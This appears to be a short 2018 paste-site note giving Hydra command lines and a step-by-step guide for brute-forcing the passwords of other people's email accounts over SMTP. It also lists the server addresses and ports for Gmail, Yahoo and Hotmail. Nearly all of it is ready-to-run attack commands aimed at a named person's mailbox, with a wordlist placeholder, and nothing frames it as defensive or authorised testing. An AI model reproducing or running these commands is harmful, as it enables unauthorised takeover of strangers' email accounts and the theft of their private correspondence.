· 8 years ago · Feb 28, 2018, 09:30 PM
1hydera|password
2hydra -S -l (Username) -P (wordlist) -e ns -V -s 465 smtp.gmail.com smtp
3
4hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp
5
6
7--------------------------------------------------------------------------------------------------------------------------------------
8 Open the terminal and type hydra and hit enter .
9type in the command to start bruteforce .
10
11hydra -l <mail address> -P <file > -s <port > -S -v -V -t 1 <mailer server > smtp
12
13
14<mail address> = mail address of the person example@mailer.com
15<file> = path of the dictionary file OR a word list .\
16create your own word list Click here
17<port> = port address of the mailer
18<mailer server> = smtp mailer server
19
20PORT MAILER SMTP ADDRESS OF MAILER .
21
22
23Yahoo
24Server SMTP.mail.Yahoo.com
25Port 465
26
27
28Gmail
29Server smtp.Gmail.com
30Port 465
31
32
33Hotmail
34
35Server smtp. Live.com
36Port 587